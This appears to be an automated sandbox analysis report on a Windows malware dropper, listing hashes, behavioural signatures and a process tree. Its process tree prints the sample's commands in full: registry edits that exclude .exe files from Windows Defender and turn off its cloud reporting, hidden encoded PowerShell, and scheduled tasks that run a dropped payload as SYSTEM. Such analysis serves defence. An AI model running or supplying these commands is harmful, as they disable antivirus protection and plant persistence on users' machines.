Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
12/11/2023, 12:03
Static task
static1
General
-
Target
fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe
-
Size
7.2MB
-
MD5
9d1ddd1ca0d9498825fbf01d391c1ccc
-
SHA1
cdcbe91eaa92af3329e770bebc10f202b7878d67
-
SHA256
fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83
-
SHA512
997e9ef7f9c4a8860cae5b88a837bea7bead14c2661d7102f47f68ece87a87494bb4fb2cd22724c95a8462d45215570972cbf5aa24bff74f4f4a6e2888772543
-
SSDEEP
98304:91OTAGL8ifPhkW0O41Z9hLMmXvheDiH2l/fcvHx9JuCshBgNw/zxmhPupr0WnloD:91OTrkNvLhQi0DweER9REqWn2PzOB8CA
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 79 4920 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation NTJmQdD.exe -
Executes dropped EXE 4 IoCs
pid Process 4460 Install.exe 2704 Install.exe 4300 wEdTimZ.exe 3692 NTJmQdD.exe -
Loads dropped DLL 1 IoCs
pid Process 4920 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json NTJmQdD.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json NTJmQdD.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini NTJmQdD.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol wEdTimZ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 NTJmQdD.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 NTJmQdD.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 NTJmQdD.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies NTJmQdD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F NTJmQdD.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini wEdTimZ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 NTJmQdD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData NTJmQdD.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi NTJmQdD.exe File created C:\Program Files (x86)\kpvgWGyvU\PIqJQcl.xml NTJmQdD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi NTJmQdD.exe File created C:\Program Files (x86)\DIGofpDPDqUn\HYznmJb.dll NTJmQdD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak NTJmQdD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja NTJmQdD.exe File created C:\Program Files (x86)\BjJZYiuqlPgU2\UOkuDxQcfAEEs.dll NTJmQdD.exe File created C:\Program Files (x86)\BjJZYiuqlPgU2\MYgSrAO.xml NTJmQdD.exe File created C:\Program Files (x86)\wStPwHPBGQsuC\KVvBbwG.dll NTJmQdD.exe File created C:\Program Files (x86)\wStPwHPBGQsuC\WhlBkRS.xml NTJmQdD.exe File created C:\Program Files (x86)\kpvgWGyvU\OuxcAE.dll NTJmQdD.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak NTJmQdD.exe File created C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\AVIjapP.dll NTJmQdD.exe File created C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\WRGnqwQ.xml NTJmQdD.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bqEFPgBHoYySYAkccD.job schtasks.exe File created C:\Windows\Tasks\bdrESRlZGEayfzFZZ.job schtasks.exe File created C:\Windows\Tasks\unWYiNUJqAlITwd.job schtasks.exe File created C:\Windows\Tasks\jRVNJXEqUfFueAuNO.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5024 schtasks.exe 2068 schtasks.exe 804 schtasks.exe 3504 schtasks.exe 3852 schtasks.exe 4484 schtasks.exe 3740 schtasks.exe 1884 schtasks.exe 2948 schtasks.exe 1144 schtasks.exe 2580 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" NTJmQdD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fd77526f-0000-0000-0000-d01200000000} NTJmQdD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fd77526f-0000-0000-0000-d01200000000}\NukeOnDelete = "0" NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ NTJmQdD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" NTJmQdD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1596 powershell.EXE 1596 powershell.EXE 1596 powershell.EXE 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 4192 powershell.exe 4192 powershell.exe 4192 powershell.exe 2824 powershell.EXE 2824 powershell.EXE 2824 powershell.EXE 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe 3692 NTJmQdD.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1596 powershell.EXE Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeDebugPrivilege 2824 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5028 wrote to memory of 4460 5028 fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe 87 PID 5028 wrote to memory of 4460 5028 fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe 87 PID 5028 wrote to memory of 4460 5028 fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe 87 PID 4460 wrote to memory of 2704 4460 Install.exe 88 PID 4460 wrote to memory of 2704 4460 Install.exe 88 PID 4460 wrote to memory of 2704 4460 Install.exe 88 PID 2704 wrote to memory of 4616 2704 Install.exe 92 PID 2704 wrote to memory of 4616 2704 Install.exe 92 PID 2704 wrote to memory of 4616 2704 Install.exe 92 PID 2704 wrote to memory of 1880 2704 Install.exe 95 PID 2704 wrote to memory of 1880 2704 Install.exe 95 PID 2704 wrote to memory of 1880 2704 Install.exe 95 PID 4616 wrote to memory of 4200 4616 forfiles.exe 97 PID 4616 wrote to memory of 4200 4616 forfiles.exe 97 PID 4616 wrote to memory of 4200 4616 forfiles.exe 97 PID 1880 wrote to memory of 4044 1880 forfiles.exe 98 PID 1880 wrote to memory of 4044 1880 forfiles.exe 98 PID 1880 wrote to memory of 4044 1880 forfiles.exe 98 PID 4200 wrote to memory of 3848 4200 cmd.exe 99 PID 4200 wrote to memory of 3848 4200 cmd.exe 99 PID 4200 wrote to memory of 3848 4200 cmd.exe 99 PID 4200 wrote to memory of 3816 4200 cmd.exe 100 PID 4200 wrote to memory of 3816 4200 cmd.exe 100 PID 4200 wrote to memory of 3816 4200 cmd.exe 100 PID 4044 wrote to memory of 1140 4044 cmd.exe 101 PID 4044 wrote to memory of 1140 4044 cmd.exe 101 PID 4044 wrote to memory of 1140 4044 cmd.exe 101 PID 4044 wrote to memory of 1092 4044 cmd.exe 102 PID 4044 wrote to memory of 1092 4044 cmd.exe 102 PID 4044 wrote to memory of 1092 4044 cmd.exe 102 PID 2704 wrote to memory of 804 2704 Install.exe 104 PID 2704 wrote to memory of 804 2704 Install.exe 104 PID 2704 wrote to memory of 804 2704 Install.exe 104 PID 2704 wrote to memory of 4488 2704 Install.exe 106 PID 2704 wrote to memory of 4488 2704 Install.exe 106 PID 2704 wrote to memory of 4488 2704 Install.exe 106 PID 1596 wrote to memory of 4124 1596 powershell.EXE 110 PID 1596 wrote to memory of 4124 1596 powershell.EXE 110 PID 2704 wrote to memory of 180 2704 Install.exe 117 PID 2704 wrote to memory of 180 2704 Install.exe 117 PID 2704 wrote to memory of 180 2704 Install.exe 117 PID 2704 wrote to memory of 3504 2704 Install.exe 119 PID 2704 wrote to memory of 3504 2704 Install.exe 119 PID 2704 wrote to memory of 3504 2704 Install.exe 119 PID 4300 wrote to memory of 3036 4300 wEdTimZ.exe 123 PID 4300 wrote to memory of 3036 4300 wEdTimZ.exe 123 PID 4300 wrote to memory of 3036 4300 wEdTimZ.exe 123 PID 3036 wrote to memory of 1336 3036 powershell.exe 126 PID 3036 wrote to memory of 1336 3036 powershell.exe 126 PID 3036 wrote to memory of 1336 3036 powershell.exe 126 PID 1336 wrote to memory of 4764 1336 cmd.exe 127 PID 1336 wrote to memory of 4764 1336 cmd.exe 127 PID 1336 wrote to memory of 4764 1336 cmd.exe 127 PID 3036 wrote to memory of 1420 3036 powershell.exe 128 PID 3036 wrote to memory of 1420 3036 powershell.exe 128 PID 3036 wrote to memory of 1420 3036 powershell.exe 128 PID 3036 wrote to memory of 3440 3036 powershell.exe 129 PID 3036 wrote to memory of 3440 3036 powershell.exe 129 PID 3036 wrote to memory of 3440 3036 powershell.exe 129 PID 3036 wrote to memory of 748 3036 powershell.exe 130 PID 3036 wrote to memory of 748 3036 powershell.exe 130 PID 3036 wrote to memory of 748 3036 powershell.exe 130 PID 3036 wrote to memory of 1596 3036 powershell.exe 131 PID 3036 wrote to memory of 1596 3036 powershell.exe 131
Processes
-
C:\Users\Admin\AppData\Local\Temp\fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe"C:\Users\Admin\AppData\Local\Temp\fe98a645d20daf3adb4e0c03b3140be6008ba51b220f5efe605367a106d9de83.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Users\Admin\AppData\Local\Temp\7zSF2FB.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\7zSF6F3.tmp\Install.exe.\Install.exe /MdidgRE "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3848
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3816
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1140
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1092
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaUPBPrML" /SC once /ST 07:00:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaUPBPrML"4⤵PID:4488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaUPBPrML"4⤵PID:180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqEFPgBHoYySYAkccD" /SC once /ST 12:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\wEdTimZ.exe\" ov /Gosite_idwLk 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3504
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4124
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4436
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:456
-
